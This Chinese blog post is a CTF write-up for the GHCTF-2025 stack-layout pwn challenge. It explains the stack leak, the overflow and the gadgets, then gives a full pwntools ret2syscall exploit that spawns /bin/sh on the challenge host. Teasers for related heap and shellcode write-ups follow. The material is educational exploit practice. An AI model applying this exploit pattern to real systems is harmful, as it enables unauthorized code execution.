NSSCTF-GHCTF-2025-真会布置栈吗？题解

Created2026-02-23|Updated2026-02-23|NSSCTF 题解

|Post Views:

题目

checksec

这是什么鸭

vmmap

这是什么鸭

没有 rwx 段， ret2shellcode 比较困难

IDA

start

这是什么鸭

泄露了栈地址，有栈溢出

gadget

这是什么鸭

xchg 是交换指令

攻击思路

其实就是 ret2syscall ，但是在栈的布局上要下点功夫，可以在一次输入内就完成攻击

布局思路：（其实就是利用 dispatcher 的特性让 rbx 拥有类似 rip 和 rsp 结合体的功能）

                            syscall_addr
                dispatcher  xchg_addr
r15             dispatcher  xor_rsi_addr
r13     print1  59          xor_rdx_addr
rbx     rsp↑    [stack]---->[     ]
rdi     print2  [stack]---->"/bin/sh\x00"
rsi     print3  gadget

整合一下：

                syscall_addr    rsp+0x38
                xchg_addr       rsp+0x30
                xor_rsi_addr    rsp+0x28
                xor_rdx_addr    rsp+0x20
                "/bin/sh\x00"   rsp+0x18
                dispatcher      rsp+0x10
r15             dispatcher      rsp+0x8
r13     print1  59              rsp+0x0
rbx     rsp↑    rsp+0x18
rdi     print2  rsp+0x18
rsi     print3  gadget

exp

from pwn import *

context.log_level = 'debug'
context.arch = 'amd64'
context.terminal = ['tmux', 'splitw', '-h']

debug = 0

if debug:
	io = process('./attachment')
else:
	io = remote('node6.anna.nssctf.cn', 28007)

gadget = 0x401017
dispatcher = 0x401011
exchange = 0x40100C
xor_rdx = 0x401021
xor_rsi = 0x401027
syscall = 0x401077

def attack():
	io.recvuntil(b'Y.  )\n')
	stack = u64(io.recv(8))
	log.info(f'stack = {hex(stack)}')
	payload = flat(p64(gadget), 
			p64(stack + 0x18), 
			p64(stack + 0x18), 
			p64(59),
			p64(dispatcher), 
			p64(dispatcher), 
			b'/bin/sh\x00', 
			p64(xor_rdx), 
			p64(xor_rsi), 
			p64(exchange), 
			p64(syscall))
	io.sendafter(b'>> ', payload)
	io.interactive()

attack()

Author: RatherHard

Link: https://www.ratherhard.com/post/NSSCTF/GHCTF-2025-areyou_goodat_hijackstack.html

Copyright Notice: All articles on this blog are licensed under CC BY-NC-SA 4.0 unless otherwise stated.

pwn NSSCTF ret2syscall

Related Articles

NSSCTF-CISCN-2021-silverwolf 题解

题目题目链接 checksec 全开 IDA main 菜单题 initbuf 有沙箱，需要 orw allocate 同一时间只能掌控一个 chunk ，最大为 0x78 edit show 用于 leak delete 有 UAF 攻击思路挺棘手的，这道题目没有任何 leak pie 和 leak stack 的手段，只能 leak libc 和 leak heap 利用 UAF 和 tcache 机制我们可以轻松 leak heap ，并把 tcache_pthread_struct 扔进 unsorted_bin 以 leak libc ，同时还可以保留 tcache_pthread_struct 的写入权限劫持到 tcache_pthread_struct 后有一个好处：我们获得了 tcache_entries 的控制权，这意味着我们可以轻松指定下一次指定大小的 chunk 的分配地址，这有利于我们布置 rop 链以及接下来的 setcontext 技巧由于我们没办法直接劫持程序流程，而且要实现 orw 的话直接劫持 free_hook 不够（参...

NSSCTF-CISCN-2022-house_of_cat 题解

题目题目链接 checksec seccomp 只能 orw ，但是限制 read 的 fd 为 0 ，于是可以先 close(0) 再 orw IDA main handle_command parse_command 需要逆向解析出指令格式 execute_command menu 套一层指令解析的菜单题 add 只能申请 largerequest 0x420~0x470 ，放入 largebin 的话， 0x420~0x430 一个 bin ， 0x440~0x470 一个 bin edit edit 限制为两次，只能写 0x30 show 用于 leak delete 有 UAF 攻击思路先分析出命令格式： COMMAND | r00tQWB QWXFarg 然后发现要 login 成为管理员，再 cat 拿菜单 12LOGIN | r00tQWB QWXFadminCAT | r00tQWB QWXF\xff 之后就是堆题只能申请固定范围内的 largebin ，考察 largebin attack 技巧，而 edit_count 的限制让...

NSSCTF-CISCN-2022-login_normal 题解

题目题目链接 checksec IDA main vuln root shellcode 有 shellcode 执行攻击思路读懂代码后发现难点主要在构造 printable shellcode 上今天状态不好，没有深入研究，用的 ae64 ，之后会自己试着搓一个看看 exp 1234567891011121314151617181920212223from pwn import *from ae64 import AE64context.log_level = 'debug'context.arch = 'amd64'context.terminal = ['tmux', 'splitw', '-h']debug = 1if debug: io = process('./service')else: io = remote('node5.buuoj.cn', 26980)def attack(): payload = b...

NSSCTF-GHCTF-2025-ret2libc2 题解

题目题目链接 checksec vmmap 这里的 0x3fe000 在远端貌似不存在，被坑了，，， IDA main func 栈溢出漏洞 got onegadget 需要用 gadget 操纵寄存器攻击思路第一次栈迁移到 got 上 leak 出 printf 的地址以获取 libc 基址第二次栈迁移为 onegadget 执行提供栈空间 exp 123456789101112131415161718192021222324252627282930313233343536from pwn import *from onegadget_selector import *context.log_level = 'debug'context.arch = 'amd64'context.terminal = ['tmux', 'splitw', '-h']debug = 0if debug: io = process('./pwn_patched...

NSSCTF-HNCTF-2022-ret2shellcode_level2 题解

题目题目链接 checksec IDA bss 段为 rwx ， buff 在 bss 段上，但是注意 strcpy 会被 \x00 截断，因此写入的 shellcode 不能有 \x00 白名单沙箱：仅允许 open 、 read 、 mmap 系统调用没有 write ，因此考虑侧信道爆破，再加一点小巧思避免 \x00 出现即可 exp 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889909192from pwn import *context.log_level = 'info'context.arch = 'amd64'context.terminal = ['tmux', 'splitw', &#...

NSSCTF-西湖论剑-2022-babycalc 题解

题目题目链接 IDA main calc 有一个 buf 相关的 off_by_null 以及由 i 操纵的 off_by_one ，无其余栈溢出漏洞因此考虑在原栈上做短程迁移以执行 rop 链要解一个 16 元方程组，图中有解出结果 got 用于泄露 libc 版本 stack 攻击思路在原栈上做短程迁移以执行 rop 链，注意要在 rop 链前面布置足够长的 ret sled 以提高命中率在正式攻击前先利用 got 表中信息泄露 libc 版本并获取 libc 正式攻击在两次读入内解决，两次均使用短程迁移第一次读入泄露 libc 基址，并返回到 main 的开始，这是因为我们需要连续两次 push rbp 支撑后面的连续两次 leave ret 使得栈迁移不会崩溃第二次 ret2libc 执行 system("/bin/sh") 即可运行时要多尝试几次 exp 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748...